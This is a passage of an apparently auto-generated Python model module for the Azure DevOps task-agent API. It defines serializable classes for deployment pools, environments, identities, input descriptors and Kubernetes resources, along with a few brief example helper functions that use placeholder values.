:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project:
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'}
}
def __init__(self, id=None, name=None, pool=None, project=None):
super(DeploymentMachineGroupReference, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project = project
class DeploymentPoolSummary(Model):
"""
Deployment pool summary.
:param deployment_groups: List of deployment groups referring to the deployment pool.
:type deployment_groups: list of :class:`DeploymentGroupReference <azure.devops.v5_1.task_agent.models.DeploymentGroupReference>`
:param offline_agents_count: Number of deployment agents that are offline.
:type offline_agents_count: int
:param online_agents_count: Number of deployment agents that are online.
:type online_agents_count: int
:param pool: Deployment pool.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param resource: Virtual machine resource referenced in the pool.
:type resource: :class:`EnvironmentResourceReference <azure.devops.v5_1.task_agent.models.EnvironmentResourceReference>`
"""
_attribute_map = {
'deployment_groups': {'key': 'deploymentGroups', 'type': '[DeploymentGroupReference]'},
'offline_agents_count': {'key': 'offlineAgentsCount', 'type': 'int'},
'online_agents_count': {'key': 'onlineAgentsCount', 'type': 'int'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'resource': {'key': 'resource', 'type': 'EnvironmentResourceReference'}
}
def __init__(self, deployment_groups=None, offline_agents_count=None, online_agents_count=None, pool=None, resource=None):
super(DeploymentPoolSummary, self).__init__()
self.deployment_groups = deployment_groups
self.offline_agents_count = offline_agents_count
self.online_agents_count = online_agents_count
self.pool = pool
self.resource = resource
class DeploymentTargetUpdateParameter(Model):
"""
Deployment target update parameter.
:param id: Identifier of the deployment target.
:type id: int
:param tags:
:type tags: list of str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, id=None, tags=None):
super(DeploymentTargetUpdateParameter, self).__init__()
self.id = id
self.tags = tags
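# Sketch: the update parameter carries the target id and the full replacement
# tag list. The assumption here is that tags are replaced rather than merged;
# verify against the service before relying on that.
def _example_target_update():
    return DeploymentTargetUpdateParameter(id=7, tags=['web', 'stable'])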
class EndpointAuthorization(Model):
"""
:param parameters: Gets or sets the parameters for the selected authorization scheme.
:type parameters: dict
:param scheme: Gets or sets the scheme used for service endpoint authentication.
:type scheme: str
"""
_attribute_map = {
'parameters': {'key': 'parameters', 'type': '{str}'},
'scheme': {'key': 'scheme', 'type': 'str'}
}
def __init__(self, parameters=None, scheme=None):
super(EndpointAuthorization, self).__init__()
self.parameters = parameters
self.scheme = scheme
class EndpointUrl(Model):
"""
Represents url of the service endpoint.
:param depends_on: Gets or sets the dependency bindings.
:type depends_on: :class:`DependsOn <azure.devops.v5_1.task_agent.models.DependsOn>`
:param display_name: Gets or sets the display name of service endpoint url.
:type display_name: str
:param help_text: Gets or sets the help text of service endpoint url.
:type help_text: str
:param is_visible: Gets or sets the visibility of service endpoint url.
:type is_visible: str
:param value: Gets or sets the value of service endpoint url.
:type value: str
"""
_attribute_map = {
'depends_on': {'key': 'dependsOn', 'type': 'DependsOn'},
'display_name': {'key': 'displayName', 'type': 'str'},
'help_text': {'key': 'helpText', 'type': 'str'},
'is_visible': {'key': 'isVisible', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, depends_on=None, display_name=None, help_text=None, is_visible=None, value=None):
super(EndpointUrl, self).__init__()
self.depends_on = depends_on
self.display_name = display_name
self.help_text = help_text
self.is_visible = is_visible
self.value = value
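# Sketch tying EndpointUrl to the DependsOn model above: the URL's value is
# resolved from whichever binding matches the 'authType' input. All names
# are illustrative.
def _example_endpoint_url():
    return EndpointUrl(
        display_name='Server URL',
        help_text='Base URL of the target server',
        is_visible='true',  # note: modeled as str, not bool
        depends_on=DependsOn(
            input='authType',
            map=[DependencyBinding(key='token', value='https://example.com/api')],
        ),
    )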
class EnvironmentCreateParameter(Model):
"""
Properties to create Environment.
:param description: Description of the environment.
:type description: str
:param name: Name of the environment.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(EnvironmentCreateParameter, self).__init__()
self.description = description
self.name = name
class EnvironmentDeploymentExecutionRecord(Model):
"""
EnvironmentDeploymentExecutionRecord.
:param definition: Definition of the environment deployment execution owner
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param environment_id: Id of the Environment
:type environment_id: int
:param finish_time: Finish time of the environment deployment execution
:type finish_time: datetime
:param id: Id of the Environment deployment execution history record
:type id: long
:param job_attempt: Job Attempt
:type job_attempt: int
:param job_name: Job name
:type job_name: str
:param owner: Owner of the environment deployment execution record
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_id: Plan Id
:type plan_id: str
:param plan_type: Plan type of the environment deployment execution record
:type plan_type: str
:param queue_time: Queue time of the environment deployment execution
:type queue_time: datetime
:param request_identifier: Request identifier of the Environment deployment execution history record
:type request_identifier: str
:param resource_id: Resource Id
:type resource_id: int
:param result: Result of the environment deployment execution
:type result: object
:param scope_id: Project Id
:type scope_id: str
:param service_owner: Service owner Id
:type service_owner: str
:param stage_attempt: Stage Attempt
:type stage_attempt: int
:param stage_name: Stage name
:type stage_name: str
:param start_time: Start time of the environment deployment execution
:type start_time: datetime
"""
_attribute_map = {
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'environment_id': {'key': 'environmentId', 'type': 'int'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'long'},
'job_attempt': {'key': 'jobAttempt', 'type': 'int'},
'job_name': {'key': 'jobName', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_id': {'key': 'planId', 'type': 'str'},
'plan_type': {'key': 'planType', 'type': 'str'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'request_identifier': {'key': 'requestIdentifier', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'int'},
'result': {'key': 'result', 'type': 'object'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'service_owner': {'key': 'serviceOwner', 'type': 'str'},
'stage_attempt': {'key': 'stageAttempt', 'type': 'int'},
'stage_name': {'key': 'stageName', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'}
}
def __init__(self, definition=None, environment_id=None, finish_time=None, id=None, job_attempt=None, job_name=None, owner=None, plan_id=None, plan_type=None, queue_time=None, request_identifier=None, resource_id=None, result=None, scope_id=None, service_owner=None, stage_attempt=None, stage_name=None, start_time=None):
super(EnvironmentDeploymentExecutionRecord, self).__init__()
self.definition = definition
self.environment_id = environment_id
self.finish_time = finish_time
self.id = id
self.job_attempt = job_attempt
self.job_name = job_name
self.owner = owner
self.plan_id = plan_id
self.plan_type = plan_type
self.queue_time = queue_time
self.request_identifier = request_identifier
self.resource_id = resource_id
self.result = result
self.scope_id = scope_id
self.service_owner = service_owner
self.stage_attempt = stage_attempt
self.stage_name = stage_name
self.start_time = start_time
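# The _attribute_map above is what drives client-side (de)serialization:
# each Python attribute maps to a camelCase JSON key plus a wire type
# ('iso-8601' datetimes, 'long' ids, nested model names). Below is a
# hand-rolled sketch of the attribute-to-key mapping only; the shipped
# client uses msrest, which also converts the wire types.
def _to_wire_keys(model):
    return dict(
        (spec['key'], getattr(model, attr))
        for attr, spec in model._attribute_map.items()
        if getattr(model, attr) is not None
    )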
class EnvironmentInstance(Model):
"""
Environment.
:param created_by: Identity reference of the user who created the Environment.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: Creation time of the Environment
:type created_on: datetime
:param description: Description of the Environment.
:type description: str
:param id: Id of the Environment
:type id: int
:param last_modified_by: Identity reference of the user who last modified the Environment.
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on: Last modified time of the Environment
:type last_modified_on: datetime
:param name: Name of the Environment.
:type name: str
:param resources:
:type resources: list of :class:`EnvironmentResourceReference <azure.devops.v5_1.task_agent.models.EnvironmentResourceReference>`
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'resources': {'key': 'resources', 'type': '[EnvironmentResourceReference]'}
}
def __init__(self, created_by=None, created_on=None, description=None, id=None, last_modified_by=None, last_modified_on=None, name=None, resources=None):
super(EnvironmentInstance, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.description = description
self.id = id
self.last_modified_by = last_modified_by
self.last_modified_on = last_modified_on
self.name = name
self.resources = resources
class EnvironmentReference(Model):
"""
:param id:
:type id: int
:param name:
:type name: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, id=None, name=None):
super(EnvironmentReference, self).__init__()
self.id = id
self.name = name
class EnvironmentResource(Model):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None):
super(EnvironmentResource, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.environment_reference = environment_reference
self.id = id
self.last_modified_by = last_modified_by
self.last_modified_on = last_modified_on
self.name = name
self.type = type
class EnvironmentResourceReference(Model):
"""
EnvironmentResourceReference.
:param id: Id of the resource.
:type id: int
:param name: Name of the resource.
:type name: str
:param type: Type of the resource.
:type type: object
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'}
}
def __init__(self, id=None, name=None, type=None):
super(EnvironmentResourceReference, self).__init__()
self.id = id
self.name = name
self.type = type
class EnvironmentUpdateParameter(Model):
"""
Properties to update Environment.
:param description: Description of the environment.
:type description: str
:param name: Name of the environment.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(EnvironmentUpdateParameter, self).__init__()
self.description = description
self.name = name
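# Sketch: the create and update parameters for an Environment carry the same
# two fields. Treating only the name as required is an assumption; the
# service validates the payload.
def _example_environment_params():
    create = EnvironmentCreateParameter(name='staging', description='Pre-prod')
    update = EnvironmentUpdateParameter(name='staging', description='Pre-prod (EU)')
    return create, update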
class GraphSubjectBase(Model):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None):
super(GraphSubjectBase, self).__init__()
self._links = _links
self.descriptor = descriptor
self.display_name = display_name
self.url = url
class HelpLink(Model):
"""
:param text:
:type text: str
:param url:
:type url: str
"""
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, text=None, url=None):
super(HelpLink, self).__init__()
self.text = text
self.url = url
class IdentityRef(GraphSubjectBase):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param directory_alias: Deprecated - Can be retrieved by querying the Graph user referenced in the "self" entry of the IdentityRef "_links" dictionary
:type directory_alias: str
:param id:
:type id: str
:param image_url: Deprecated - Available in the "avatar" entry of the IdentityRef "_links" dictionary
:type image_url: str
:param inactive: Deprecated - Can be retrieved by querying the Graph membership state referenced in the "membershipState" entry of the GraphUser "_links" dictionary
:type inactive: bool
:param is_aad_identity: Deprecated - Can be inferred from the subject type of the descriptor (Descriptor.IsAadUserType/Descriptor.IsAadGroupType)
:type is_aad_identity: bool
:param is_container: Deprecated - Can be inferred from the subject type of the descriptor (Descriptor.IsGroupType)
:type is_container: bool
:param is_deleted_in_origin:
:type is_deleted_in_origin: bool
:param profile_url: Deprecated - not in use in most preexisting implementations of ToIdentityRef
:type profile_url: str
:param unique_name: Deprecated - use Domain+PrincipalName instead
:type unique_name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'directory_alias': {'key': 'directoryAlias', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'image_url': {'key': 'imageUrl', 'type': 'str'},
'inactive': {'key': 'inactive', 'type': 'bool'},
'is_aad_identity': {'key': 'isAadIdentity', 'type': 'bool'},
'is_container': {'key': 'isContainer', 'type': 'bool'},
'is_deleted_in_origin': {'key': 'isDeletedInOrigin', 'type': 'bool'},
'profile_url': {'key': 'profileUrl', 'type': 'str'},
'unique_name': {'key': 'uniqueName', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, directory_alias=None, id=None, image_url=None, inactive=None, is_aad_identity=None, is_container=None, is_deleted_in_origin=None, profile_url=None, unique_name=None):
super(IdentityRef, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url)
self.directory_alias = directory_alias
self.id = id
self.image_url = image_url
self.inactive = inactive
self.is_aad_identity = is_aad_identity
self.is_container = is_container
self.is_deleted_in_origin = is_deleted_in_origin
self.profile_url = profile_url
self.unique_name = unique_name
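# Sketch of the subclassing convention used throughout this module:
# IdentityRef forwards the GraphSubjectBase fields to super().__init__ and
# only assigns its own additions. All values below are placeholders.
def _example_identity_ref():
    return IdentityRef(
        display_name='Jamal Hartnett',
        descriptor='aad.YmFzZTY0',  # hypothetical subject descriptor
        id='00000000-0000-0000-0000-000000000000',
    )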
class InputDescriptor(Model):
"""
Describes an input for subscriptions.
:param dependency_input_ids: The ids of all inputs that the value of this input is dependent on.
:type dependency_input_ids: list of str
:param description: Description of what this input is used for
:type description: str
:param group_name: The group localized name to which this input belongs and can be shown as a header for the container that will include all the inputs in the group.
:type group_name: str
:param has_dynamic_value_information: If true, the value information for this input is dynamic and should be fetched when the value of dependency inputs change.
:type has_dynamic_value_information: bool
:param id: Identifier for the subscription input
:type id: str
:param input_mode: Mode in which the value of this input should be entered
:type input_mode: object
:param is_confidential: Gets whether this input is confidential, such as for a password or application key
:type is_confidential: bool
:param name: Localized name which can be shown as a label for the subscription input
:type name: str
:param properties: Custom properties for the input which can be used by the service provider
:type properties: dict
:param type: Underlying data type for the input value. When this value is specified, InputMode, Validation and Values are optional.
:type type: str
:param use_in_default_description: Gets whether this input is included in the default generated action description.
:type use_in_default_description: bool
:param validation: Information to use to validate this input's value
:type validation: :class:`InputValidation <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValidation>`
:param value_hint: A hint for input value. It can be used in the UI as the input placeholder.
:type value_hint: str
:param values: Information about possible values for this input
:type values: :class:`InputValues <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValues>`
"""
_attribute_map = {
'dependency_input_ids': {'key': 'dependencyInputIds', 'type': '[str]'},
'description': {'key': 'description', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'has_dynamic_value_information': {'key': 'hasDynamicValueInformation', 'type': 'bool'},
'id': {'key': 'id', 'type': 'str'},
'input_mode': {'key': 'inputMode', 'type': 'object'},
'is_confidential': {'key': 'isConfidential', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{object}'},
'type': {'key': 'type', 'type': 'str'},
'use_in_default_description': {'key': 'useInDefaultDescription', 'type': 'bool'},
'validation': {'key': 'validation', 'type': 'InputValidation'},
'value_hint': {'key': 'valueHint', 'type': 'str'},
'values': {'key': 'values', 'type': 'InputValues'}
}
def __init__(self, dependency_input_ids=None, description=None, group_name=None, has_dynamic_value_information=None, id=None, input_mode=None, is_confidential=None, name=None, properties=None, type=None, use_in_default_description=None, validation=None, value_hint=None, values=None):
super(InputDescriptor, self).__init__()
self.dependency_input_ids = dependency_input_ids
self.description = description
self.group_name = group_name
self.has_dynamic_value_information = has_dynamic_value_information
self.id = id
self.input_mode = input_mode
self.is_confidential = is_confidential
self.name = name
self.properties = properties
self.type = type
self.use_in_default_description = use_in_default_description
self.validation = validation
self.value_hint = value_hint
self.values = values
class InputValidation(Model):
"""
Describes what values are valid for a subscription input
:param data_type: Gets or sets the data type to validate.
:type data_type: object
:param is_required: Gets or sets whether this is a required field.
:type is_required: bool
:param max_length: Gets or sets the maximum length of this descriptor.
:type max_length: int
:param max_value: Gets or sets the maximum value for this descriptor.
:type max_value: decimal
:param min_length: Gets or sets the minimum length of this descriptor.
:type min_length: int
:param min_value: Gets or sets the minimum value for this descriptor.
:type min_value: decimal
:param pattern: Gets or sets the pattern to validate.
:type pattern: str
:param pattern_mismatch_error_message: Gets or sets the error on pattern mismatch.
:type pattern_mismatch_error_message: str
"""
_attribute_map = {
'data_type': {'key': 'dataType', 'type': 'object'},
'is_required': {'key': 'isRequired', 'type': 'bool'},
'max_length': {'key': 'maxLength', 'type': 'int'},
'max_value': {'key': 'maxValue', 'type': 'decimal'},
'min_length': {'key': 'minLength', 'type': 'int'},
'min_value': {'key': 'minValue', 'type': 'decimal'},
'pattern': {'key': 'pattern', 'type': 'str'},
'pattern_mismatch_error_message': {'key': 'patternMismatchErrorMessage', 'type': 'str'}
}
def __init__(self, data_type=None, is_required=None, max_length=None, max_value=None, min_length=None, min_value=None, pattern=None, pattern_mismatch_error_message=None):
super(InputValidation, self).__init__()
self.data_type = data_type
self.is_required = is_required
self.max_length = max_length
self.max_value = max_value
self.min_length = min_length
self.min_value = min_value
self.pattern = pattern
self.pattern_mismatch_error_message = pattern_mismatch_error_message
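# Sketch: a validation descriptor for a required whole-number input
# constrained to 1..100. All values are illustrative.
def _example_input_validation():
    return InputValidation(
        is_required=True,
        min_value=1,
        max_value=100,
        pattern=r'^\d+$',
        pattern_mismatch_error_message='Enter a whole number.',
    )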
class InputValidationRequest(Model):
"""
:param inputs:
:type inputs: dict
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{ValidationItem}'}
}
def __init__(self, inputs=None):
super(InputValidationRequest, self).__init__()
self.inputs = inputs
class InputValue(Model):
"""
Information about a single value for an input
:param data: Any other data about this input
:type data: dict
:param display_value: The text to show for the display of this value
:type display_value: str
:param value: The value to store for this input
:type value: str
"""
_attribute_map = {
'data': {'key': 'data', 'type': '{object}'},
'display_value': {'key': 'displayValue', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, data=None, display_value=None, value=None):
super(InputValue, self).__init__()
self.data = data
self.display_value = display_value
self.value = value
class InputValues(Model):
"""
Information about the possible/allowed values for a given subscription input
:param default_value: The default value to use for this input
:type default_value: str
:param error: Errors encountered while computing dynamic values.
:type error: :class:`InputValuesError <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValuesError>`
:param input_id: The id of the input
:type input_id: str
:param is_disabled: Should this input be disabled
:type is_disabled: bool
:param is_limited_to_possible_values: Should the value be restricted to one of the values in the PossibleValues (True) or are the values in PossibleValues just a suggestion (False)
:type is_limited_to_possible_values: bool
:param is_read_only: Should this input be made read-only
:type is_read_only: bool
:param possible_values: Possible values that this input can take
:type possible_values: list of :class:`InputValue <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValue>`
"""
_attribute_map = {
'default_value': {'key': 'defaultValue', 'type': 'str'},
'error': {'key': 'error', 'type': 'InputValuesError'},
'input_id': {'key': 'inputId', 'type': 'str'},
'is_disabled': {'key': 'isDisabled', 'type': 'bool'},
'is_limited_to_possible_values': {'key': 'isLimitedToPossibleValues', 'type': 'bool'},
'is_read_only': {'key': 'isReadOnly', 'type': 'bool'},
'possible_values': {'key': 'possibleValues', 'type': '[InputValue]'}
}
def __init__(self, default_value=None, error=None, input_id=None, is_disabled=None, is_limited_to_possible_values=None, is_read_only=None, possible_values=None):
super(InputValues, self).__init__()
self.default_value = default_value
self.error = error
self.input_id = input_id
self.is_disabled = is_disabled
self.is_limited_to_possible_values = is_limited_to_possible_values
self.is_read_only = is_read_only
self.possible_values = possible_values
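# Sketch: restricting an input to an explicit value list. Setting
# is_limited_to_possible_values=True makes the list authoritative rather
# than a suggestion (per the docstring above). Values are placeholders.
def _example_input_values():
    return InputValues(
        input_id='region',
        default_value='westus',
        is_limited_to_possible_values=True,
        possible_values=[
            InputValue(value='westus', display_value='West US'),
            InputValue(value='northeurope', display_value='North Europe'),
        ],
    )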
class InputValuesError(Model):
"""
Error information related to a subscription input value.
:param message: The error message.
:type message: str
"""
_attribute_map = {
'message': {'key': 'message', 'type': 'str'}
}
def __init__(self, message=None):
super(InputValuesError, self).__init__()
self.message = message
class KubernetesResource(EnvironmentResource):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
:param cluster_name:
:type cluster_name: str
:param namespace:
:type namespace: str
:param service_endpoint_id:
:type service_endpoint_id: str
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'},
'cluster_name': {'key': 'clusterName', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'service_endpoint_id': {'key': 'serviceEndpointId', 'type': 'str'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None, cluster_name=None, namespace=None, service_endpoint_id=None):
super(KubernetesResource, self).__init__(created_by=created_by, created_on=created_on, environment_reference=environment_reference, id=id, last_modified_by=last_modified_by, last_modified_on=last_modified_on, name=name, type=type)
self.cluster_name = cluster_name
self.namespace = namespace
self.service_endpoint_id = service_endpoint_id
class KubernetesResourceCreateParameters(Model):
"""
:param cluster_name:
:type cluster_name: str
:param name:
:type name: str
:param namespace:
:type namespace: str
:param service_endpoint_id:
:type service_endpoint_id: str
"""
_attribute_map = {
'cluster_name': {'key': 'clusterName', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'service_endpoint_id': {'key': 'serviceEndpointId', 'type': 'str'}
}
def __init__(self, cluster_name=None, name=None, namespace=None, service_endpoint_id=None):
super(KubernetesResourceCreateParameters, self).__init__()
self.cluster_name = cluster_name
self.name = name
self.namespace = namespace
self.service_endpoint_id = service_endpoint_id
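# Sketch: the create-parameters mirror the KubernetesResource fields the
# caller controls; the service fills in the audit fields (created_by, etc.).
# The endpoint id below is a hypothetical service connection.
def _example_kubernetes_resource_create():
    return KubernetesResourceCreateParameters(
        name='aks-staging',
        cluster_name='aks-cluster-01',
        namespace='staging',
        service_endpoint_id='00000000-0000-0000-0000-000000000000',
    )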
class MarketplacePurchasedLicense(Model):
"""
Represents a purchase of resource units in a secondary marketplace.
:param marketplace_name: The Marketplace display name.
:type marketplace_name: str
:param purchaser_name: The name of the identity making the purchase as seen by the marketplace
:type purchaser_name: str
:param purchase_unit_count: The quantity purchased.
:type purchase_unit_count: int
"""
_attribute_map = {
'marketplace_name': {'key': 'marketplaceName', 'type': 'str'},
'purchaser_name': {'key': 'purchaserName', 'type': 'str'},
'purchase_unit_count': {'key': 'purchaseUnitCount', 'type': 'int'}
}
def __init__(self, marketplace_name=None, purchaser_name=None, purchase_unit_count=None):
super(MarketplacePurchasedLicense, self).__init__()
self.marketplace_name = marketplace_name
self.purchaser_name = purchaser_name
self.purchase_unit_count = purchase_unit_count
class MetricsColumnMetaData(Model):
"""
Meta data for a metrics column.
:param column_name: Name.
:type column_name: str
:param column_value_type: Data type.
:type column_value_type: str
"""
_attribute_map = {
'column_name': {'key': 'columnName', 'type': 'str'},
'column_value_type': {'key': 'columnValueType', 'type': 'str'}
}
def __init__(self, column_name=None, column_value_type=None):
super(MetricsColumnMetaData, self).__init__()
self.column_name = column_name
self.column_value_type = column_value_type
class MetricsColumnsHeader(Model):
"""
Metrics columns header
:param dimensions: Properties of deployment group for which metrics are provided. E.g. 1: LastJobStatus. E.g. 2: TargetState.
:type dimensions: list of :class:`MetricsColumnMetaData <azure.devops.v5_1.task_agent.models.MetricsColumnMetaData>`
:param metrics: The types of metrics. E.g. 1: total count of deployment targets. E.g. 2: Average time of deployment to the deployment targets.
:type metrics: list of :class:`MetricsColumnMetaData <azure.devops.v5_1.task_agent.models.MetricsColumnMetaData>`
"""
_attribute_map = {
'dimensions': {'key': 'dimensions', 'type': '[MetricsColumnMetaData]'},
'metrics': {'key': 'metrics', 'type': '[MetricsColumnMetaData]'}
}
def __init__(self, dimensions=None, metrics=None):
super(MetricsColumnsHeader, self).__init__()
self.dimensions = dimensions
self.metrics = metrics
class MetricsRow(Model):
"""
Metrics row.
:param dimensions: The values of the properties mentioned as 'Dimensions' in column header. E.g. 1: For a property 'LastJobStatus' - metrics will be provided for 'passed', 'failed', etc. E.g. 2: For a property 'TargetState' - metrics will be provided for 'online', 'offline' targets.
:type dimensions: list of str
:param metrics: Metrics in serialized format. Should be deserialized based on the data type provided in header.
:type metrics: list of str
"""
_attribute_map = {
'dimensions': {'key': 'dimensions', 'type': '[str]'},
'metrics': {'key': 'metrics', 'type': '[str]'}
}
def __init__(self, dimensions=None, metrics=None):
super(MetricsRow, self).__init__()
self.dimensions = dimensions
self.metrics = metrics
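# Sketch: columns_header describes the shape and each MetricsRow carries the
# values positionally; dimensions line up with header.dimensions and metrics
# with header.metrics, with values arriving serialized as strings.
def _example_metrics():
    header = MetricsColumnsHeader(
        dimensions=[MetricsColumnMetaData(column_name='TargetState', column_value_type='string')],
        metrics=[MetricsColumnMetaData(column_name='Count', column_value_type='number')],
    )
    rows = [MetricsRow(dimensions=['offline'], metrics=['3'])]
    return DeploymentGroupMetrics(columns_header=header, rows=rows)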
class PackageMetadata(Model):
"""
Represents a downloadable package.
:param created_on: The date the package was created
:type created_on: datetime
:param download_url: A direct link to download the package.
:type download_url: str
:param filename: The UI uses this to display instructions, e.g. "unzip MyAgent.zip"
:type filename: str
:param hash_value: MD5 hash as a base64 string
:type hash_value: str
:param info_url: A link to documentation
:type info_url: str
:param platform: The platform (win7, linux, etc.)
:type platform: str
:param type: The type of package (e.g. "agent")
:type type: str
:param version: The package version.
:type version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
"""
_attribute_map = {
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'filename': {'key': 'filename', 'type': 'str'},
'hash_value': {'key': 'hashValue', 'type': 'str'},
